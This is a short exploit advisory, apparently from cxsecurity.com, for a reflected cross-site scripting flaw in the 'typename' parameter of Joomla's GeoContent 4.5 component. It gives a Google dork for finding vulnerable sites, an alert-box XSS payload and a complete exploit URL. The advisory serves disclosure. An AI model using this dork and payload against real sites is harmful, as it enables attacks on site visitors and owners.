Joomla Component GeoContent 4.5 - Cross-site scripting

Published
Credit
Risk
2017.02.14
Persian Hack Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: inurl:index.php?option=com_geocontent

# Exploit Title: Joomla Component GeoContent 4.5 - Cross-site scripting
# Date: 2017-02-13
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/geocontent/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_geocontent
# Tested on: Windows

# POC :
# typename Parameter Vulnerable to Cross-site scripting
# Payload : <img src="1" onerror=alert('XSS')>
# Exploit : http://www.Target.com/index.php?option=com_geocontent&task=layers.kml&typename=%3Cimg%20src=%221%22%20onerror=alert%28%27XSS%27%29%3E

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com